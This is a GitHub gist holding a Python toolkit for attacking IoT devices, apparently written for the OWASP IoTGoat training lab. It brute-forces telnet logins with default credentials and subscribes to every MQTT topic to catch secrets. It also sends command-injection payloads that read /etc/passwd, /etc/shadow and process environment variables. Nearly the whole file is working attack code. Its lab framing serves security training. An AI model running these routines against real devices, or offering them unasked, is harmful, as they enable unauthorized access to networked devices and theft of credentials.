Forked from williamzujkowski/iot-vulnerability-testing.py
Created
December 3, 2025 11:46
-
-
Save adampielak/d44845d144ab52a713cfdc33497200f7 to your computer and use it in GitHub Desktop.
IoT Vulnerability Testing Toolkit - Default credentials, MQTT discovery, command injection tests for OWASP IoTGoat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| IoT Vulnerability Testing Toolkit | |
| Combines default credential testing, MQTT discovery, and command injection tests | |
| for OWASP IoTGoat security assessment | |
| """ | |
| import telnetlib | |
| import time | |
| import paho.mqtt.client as mqtt | |
| import requests | |
| # Common default credentials in IoT devices | |
| credentials = [ | |
| ('admin', 'admin'), | |
| ('root', 'root'), | |
| ('admin', '1234'), | |
| ('user', 'user'), | |
| ('admin', 'password') | |
| ] | |
| def test_telnet_auth(host, port=23): | |
| """Test for default credentials on telnet service""" | |
| for username, password in credentials: | |
| try: | |
| tn = telnetlib.Telnet(host, port, timeout=5) | |
| tn.read_until(b"login: ") | |
| tn.write(username.encode() + b"\n") | |
| tn.read_until(b"Password: ") | |
| tn.write(password.encode() + b"\n") | |
| result = tn.read_some() | |
| if b"#" in result or b"$" in result: | |
| print(f"[+] Found credentials: {username}:{password}") | |
| return True | |
| except: | |
| continue | |
| return False | |
| class MQTTExplorer: | |
| def __init__(self, broker_addr): | |
| self.broker = broker_addr | |
| self.client = mqtt.Client() | |
| self.discovered_topics = set() | |
| def on_connect(self, client, userdata, flags, rc): | |
| if rc == 0: | |
| print("[+] Connected to MQTT broker") | |
| # Subscribe to all topics | |
| client.subscribe("#", 0) | |
| client.subscribe("$SYS/#", 0) | |
| def on_message(self, client, userdata, msg): | |
| self.discovered_topics.add(msg.topic) | |
| print(f"[*] Topic: {msg.topic}") | |
| print(f" Payload: {msg.payload.decode('utf-8', 'ignore')}") | |
| # Check for sensitive data patterns | |
| payload = msg.payload.decode('utf-8', 'ignore') | |
| if any(keyword in payload.lower() for keyword in | |
| ['password', 'token', 'key', 'secret']): | |
| print("[!] Potential sensitive data found!") | |
| def test_command_injection(url, param_name): | |
| """Test for command injection vulnerabilities""" | |
| payloads = [ | |
| "; cat /etc/passwd", | |
| "| cat /etc/shadow", | |
| "$(cat /proc/self/environ)", | |
| "`id`" | |
| ] | |
| for payload in payloads: | |
| data = {param_name: f"test{payload}"} | |
| response = requests.post(url, data=data) | |
| if "root:" in response.text or "uid=" in response.text: | |
| print(f"[!] Command injection found with: {payload}") | |
| return True | |
| return False | |
| if __name__ == "__main__": | |
| # Example usage | |
| print("IoT Vulnerability Testing Toolkit") | |
| print("=" * 50) | |
| # Test telnet authentication | |
| # test_telnet_auth("iotgoat.local") | |
| # Test MQTT discovery | |
| # explorer = MQTTExplorer("iotgoat.local") | |
| # explorer.client.on_connect = explorer.on_connect | |
| # explorer.client.on_message = explorer.on_message | |
| # explorer.client.connect(explorer.broker, 1883, 60) | |
| # explorer.client.loop_forever() | |
| # Test command injection | |
| # test_command_injection("http://iotgoat.local/api/device", "device_name") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment